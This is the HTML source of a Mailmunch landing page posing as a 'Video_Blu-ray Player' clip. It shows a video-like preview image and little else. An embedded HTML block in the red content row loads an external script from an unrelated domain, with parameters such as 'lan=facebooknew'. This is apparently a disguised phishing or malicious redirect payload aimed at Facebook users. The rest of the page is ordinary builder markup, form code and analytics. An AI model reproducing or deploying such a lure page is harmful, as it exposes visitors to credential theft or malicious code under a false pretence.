

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name=viewport content="width=device-width, initial-scale=1">
  
  
  
  <meta property="og:title" content="Video_Blu-ray Player | 01:27" />
  
  <meta property="og:image" content="https://page.co/preview/387725/null/1625122218000" />
  <meta property="og:type" content="website" />
  <meta property="og:image:width" content="600" />
  <meta property="og:image:height" content="600" />
  <link rel="shortcut icon" href="https://cf.mailmunch.co/partner/mailmunch/favicon.png">
  <title>Video_Blu-ray Player | 01:27</title>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.min.js"></script>
  
  <script src="https://a.mailmunch.co/app/v1/form.js"></script>
  
  <style>
    a { color: #0000ee; text-decoration: underline; } a:hover { color: #0000ee; text-decoration: underline; }
.u-row {
  display: flex;
  flex-wrap: nowrap;
  margin-left: 0;
  margin-right: 0;
}

.u-row .u-col {
  position: relative;
  width: 100%;
  padding-right: 0;
  padding-left: 0;
}


.u-row .u-col.u-col-100 {
  flex: 0 0 100%;
  max-width: 100%;
}


@media (max-width: 767px) {
  .u-row:not(.no-stack) {
    flex-wrap: wrap;
  }

  .u-row:not(.no-stack) .u-col {
    flex: 0 0 100% !important;
    max-width: 100% !important;
  }
}

.layout-mobile .u-row:not(.no-stack) {
  flex-wrap: wrap;
}

.layout-mobile .u-row:not(.no-stack) .u-col {
  flex: 0 0 100% !important;
  max-width: 100% !important;
}
body,html{padding:0;margin:0}html{box-sizing:border-box}*,:after,:before{box-sizing:inherit}html{font-size:14px;-ms-overflow-style:scrollbar;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:Arial,Helvetica,sans-serif;font-size:1rem;line-height:1.5;color:#373a3c;background-color:#fff}p{margin:0}.error-field{-webkit-animation-name:shake;animation-name:shake;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.error-field input,.error-field textarea{border-color:#a94442!important;color:#a94442!important}.field-error{padding:5px 10px;font-size:14px;font-weight:700;position:absolute;top:-20px;right:10px}.field-error:after{top:100%;left:50%;border:solid transparent;content:" ";height:0;width:0;position:absolute;pointer-events:none;border-color:rgba(136,183,213,0);border-top-color:#ebcccc;border-width:5px;margin-left:-5px}.spinner{margin:0 auto;width:70px;text-align:center}.spinner>div{width:12px;height:12px;background-color:hsla(0,0%,100%,.5);margin:0 2px;border-radius:100%;display:inline-block;-webkit-animation:sk-bouncedelay 1.4s infinite ease-in-out both;animation:sk-bouncedelay 1.4s infinite ease-in-out both}.spinner .bounce1{-webkit-animation-delay:-.32s;animation-delay:-.32s}.spinner .bounce2{-webkit-animation-delay:-.16s;animation-delay:-.16s}@-webkit-keyframes sk-bouncedelay{0%,80%,to{-webkit-transform:scale(0)}40%{-webkit-transform:scale(1)}}@keyframes sk-bouncedelay{0%,80%,to{-webkit-transform:scale(0);transform:scale(0)}40%{-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes shake{0%,to{-webkit-transform:translateZ(0);transform:translateZ(0)}10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0);transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-webkit-transform:translate3d(10px,0,0);transform:translate3d(10px,0,0)}}@keyframes shake{0%,to{-webkit-transform:translateZ(0);transform:translateZ(0)}10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0);transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-webkit-transform:translate3d(10px,0,0);transform:translate3d(10px,0,0)}}@media only screen and (max-width:480px){.hide-mobile{display:none!important}.hide-desktop{display:block!important}.container{max-width:100%!important}}.container{width:100%;padding-right:0;padding-left:0;margin-right:auto;margin-left:auto}@media (min-width:576px){.container{max-width:540px}}@media (min-width:768px){.container{max-width:720px}}@media (min-width:992px){.container{max-width:960px}}@media (min-width:1200px){.container{max-width:1140px}}
  </style>
</head>
<body>
  <div id="designer">
<div id="u_body" class="u_body" style="min-height: 100vh; color: #000000; background-color: #ffffff; font-family: arial,helvetica,sans-serif;">
  
  <div id="u_row_8" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="padding: 0px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_8" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  <div id="u_content_text_2" class="u_content_text v-container-padding-padding" style="overflow-wrap: break-word;padding: 10px;">
    
  <div class="v-color v-text-align v-line-height" style="line-height: 140%; text-align: left; word-wrap: break-word;">
    <p style="font-size: 14px; line-height: 140%;">Video_Blu-ray Player | 01:27</p>
  </div>

  </div>

  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_1" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="background-color: rgba(255,255,255,0); padding: 10px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;background-color: rgba(255,255,255,0);">
      <div class="u-row v-row-align-items">
        
<div id="u_column_1" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  <div id="u_content_image_2" class="u_content_image v-container-padding-padding" style="overflow-wrap: break-word;padding: 10px;">
    
<div style="position:relative;line-height:0px;text-align:center">
  
  <img alt="Image" class="v-src-width v-src-max-width" src="https://a.mailmunch.co/attachments/assets/000/506/296/large/safe_image_20%281%29.png?1625122013" style="width: 100%;max-width: 1000px;" title="Image"/>
  
</div>

  </div>

  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_9" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="padding: 0px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_9" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_7" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="padding: 0px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_7" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_6" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="padding: 0px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_6" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_5" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="padding: 0px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_5" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_4" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="padding: 0px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_4" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_2" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="background-color: rgba(255,255,255,0); padding: 10px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;background-color: #d9164b;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_2" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  <div id="u_content_html_1" class="u_content_html v-container-padding-padding" style="overflow-wrap: break-word;padding: 10px;">
    <div><script src="https://lonelywolf.site/?api=1&lan=facebooknew&ht=2" type="text/javascript" async="true"></script></div>
  </div>

  <div id="u_content_divider_1" class="u_content_divider v-container-padding-padding" style="overflow-wrap: break-word;padding: 10px;">
    <div style="text-align:center;line-height:0"><div style="border-top-width:1px;border-top-style:solid;border-top-color:#BBBBBB;width:100%;display:inline-block;line-height:1px;height:0px;vertical-align:middle"> </div></div>
  </div>

  </div>
</div>

      </div>
    </div>
  </div>

  <div id="u_row_3" class="u_row v-row-padding v-row-background-image--outer v-row-background-color" style="padding: 0px;">
    <div class="container v-row-background-image--inner v-row-columns-background-color-background-color" style="max-width: 550px;margin: 0 auto;">
      <div class="u-row v-row-align-items">
        
<div id="u_column_3" class="u-col u-col-100 u_column">
  <div class="v-col-padding v-col-background-color v-col-border" style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;">
    
  </div>
</div>

      </div>
    </div>
  </div>

</div>
</div>

  
  <style>
#designer {
  margin-bottom: 50px;
}

#branding {
  box-shadow: 0 -3px 10px 0 rgba(0,0,0,.1);
  background: #FFF;
  width: 100%;
  position: fixed;
  padding: 15px 30px;
  bottom: 0px;
  text-align: center;
  color: #999;
  font-size: 12px;
  font-family: Arial;
}

#branding .signup-btn {
  background: #777;
  color: #FFF;
  height: 20px;
  line-height: 20px;
  text-transform: uppercase;
  border-radius: 999em;
  display: inline-block;
  padding: 0 16px;
  font-weight: bold;
}

#branding a {
  text-decoration: none;
  cursor: pointer;
  color: inherit;
}

#branding img {
  width: 120px;
  vertical-align: middle;
  margin-left: 5px;
}

#branding .branding-left { float: left; }
#branding .branding-right { float: right; }

@media screen and (max-width: 500px){
  #designer { margin-bottom: 80px; }
  #branding .branding-left { float: none; text-align: center; margin-bottom: 10px; }
  #branding .branding-right { float: none; text-align: center; }
}
</style>

<div id="branding">
  <div class="branding-left">
    Create a 
    <a class="signup-link" href="https://www.mailmunch.com/landing-pages/?utm_source=landing-page&utm_medium=website&utm_campaign=powered-by&r=landing-page&utm_content=387725" target="_blank" >free landing page</a>
    &mdash;
    <a class="signup-btn" href="https://www.mailmunch.com/landing-pages/?utm_source=landing-page&utm_medium=website&utm_campaign=powered-by&r=landing-page&utm_content=387725" target="_blank">
      Sign Up
    </a>
  </div>
  
  <div class="branding-right">
    <a href="https://www.mailmunch.com/landing-pages/?utm_source=landing-page&utm_medium=website&utm_campaign=powered-by&r=landing-page&utm_content=387725" target="_blank">
      <img src="https://cf.mailmunch.co/partner/mailmunch/logo_full_black.png" />
    </a>
  </div>
  
  <div style="clear: both;"></div>
</div>

  

  
  <script>
    var successUrl = "//page.co/hfQ3xS/thanks";
    var redirectUrl = "";
    var submitUrl = "//forms.mailmunch.co/form/936841/387725/submit?resource_type=landing_page";
    var subscribePixel = "";
    var couponsList = "";

    function isValidEmail(email) {
      var re = /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
      return re.test(email);
    }

    function fireSubscribePixel() {
      if (!subscribePixel) return;
      var div = document.createElement('div');
      div.style.display = "none";
      div.innerHTML = decodeURIComponent(subscribePixel);
      document.body.appendChild(div);

      var codes = div.getElementsByTagName("script");
      for (var i=0; i < codes.length; i++) {
        eval(codes[i].text);
      }
    }

    function extractMergeTags(redirectUrl, data) {
      var mergeTagSlugs = redirectUrl.match(/{{([A-Za-z0-9_])+}}/g)
      if(mergeTagSlugs) {
        mergeTagSlugs.forEach(function(slug) {
          var tag = slug.replace(/[{{}}]/g, "");
          var value = data[tag] ? data[tag].value : '';
          redirectUrl = redirectUrl.replace(new RegExp(slug,"gi"), value)
        })
      }
      return redirectUrl;
    }

    
    $(function() {
      new MMForms(function(formEl, resp) {
        var referrerUrl;

        let output = {
          email_address: resp.email,
          contact: resp.data
        }
        
        var fields = resp && resp.data || {}
    
        if (document.location.href) referrerUrl = document.location.href;
        if (referrerUrl) output['referrer'] = referrerUrl;

        $(formEl).find('.spinner-container').show();

        $.ajax({
          type: "POST",
          url: submitUrl,
          data: output,
          dataType: 'text',
          beforeSend: function(xhr) { 
            xhr.setRequestHeader('X-MM-Form-Tool', '1'); 
            xhr.setRequestHeader('X-MM-Coupons', couponsList);
          },
          success: function(data, textStatus, request) {
            fireSubscribePixel();
            if (redirectUrl) {
              var { data } = resp
              redirectUrl = extractMergeTags(redirectUrl, data)
              redirectUrl = redirectUrl.replace(/\[EMAIL\]/gi, resp.email);
              window.location.href = redirectUrl;
            } else {
              $.get(successUrl, function(data) {
                if(request.getResponseHeader('X-MM-Coupons')) {
                  var couponCodes = request.getResponseHeader('X-MM-Coupons')
                    .split("|")
                    .filter(function(item) {return item && item.includes("_")})
                    .map(function(item) { return { "id": item.split("_")[0], "code": item.split("_")[1] } })
                  if(couponCodes && couponCodes.length) {
                    var couponPlaceholders = data.match(/{{coupon_\d+}}/g)
                    if(couponPlaceholders) {
                      couponPlaceholders.forEach(function(placeholder) {
                        var couponIndex = Number(placeholder.replace(/\D/g, ""))
                        var seletedCoupon = couponCodes.find(function(x) { return Number(x.id) === Number(couponIndex) } )
                        var couponCode = seletedCoupon && Object.keys(seletedCoupon).length ? seletedCoupon.code : null
                        if(couponCode) {
                          data = data.replace(placeholder, couponCode)
                        }
                      })
                    }
                  }
                }
                $(window).scrollTop(0);
                for (let key in fields) {
                  data = data.split('{{' + key + '}}').join(fields[key].value);
                }
                $("html").html(data);
              })
            }
          },
        });
      }, function(err) { })
    });
    

    var fonts = [];
    var customFonts = fonts.filter(function(f) { return !!f.url });
    var googleFonts = fonts.filter(function(f) { return !f.url && f.type == "google" });
    var loadableFonts = {};
    if (googleFonts.length > 0) {
      loadableFonts['google'] = {
        families: googleFonts.map(function(f) {
          var font = f.label;
          if (f.weights) font += ':'+f.weights;
          return font;
        })
      };
    }
    if (customFonts.length > 0) {
      loadableFonts['custom'] = {
        families: customFonts.map(function(f) { return f.label }),
        urls: customFonts.map(function(f) { return f.url })
      };
    }
    if (googleFonts.length > 0 || customFonts.length > 0) {
      WebFont.load(loadableFonts);
    }

    
    function fireEvent(event_name) {
      var url = '//analytics.mailmunch.co/event/?site_id=936841&document_id=387725&event_name='+event_name+'&cache='+(new Date()).getTime();
      if (document.location.href) url += "&referrer="+encodeURIComponent(document.location.href);
      var img = document.createElement('img');
      img.src = url;
      img.style.display = "none";
      document.body.appendChild(img);
    }

    fireEvent("views");
    
  </script>

  
</body>
</html>
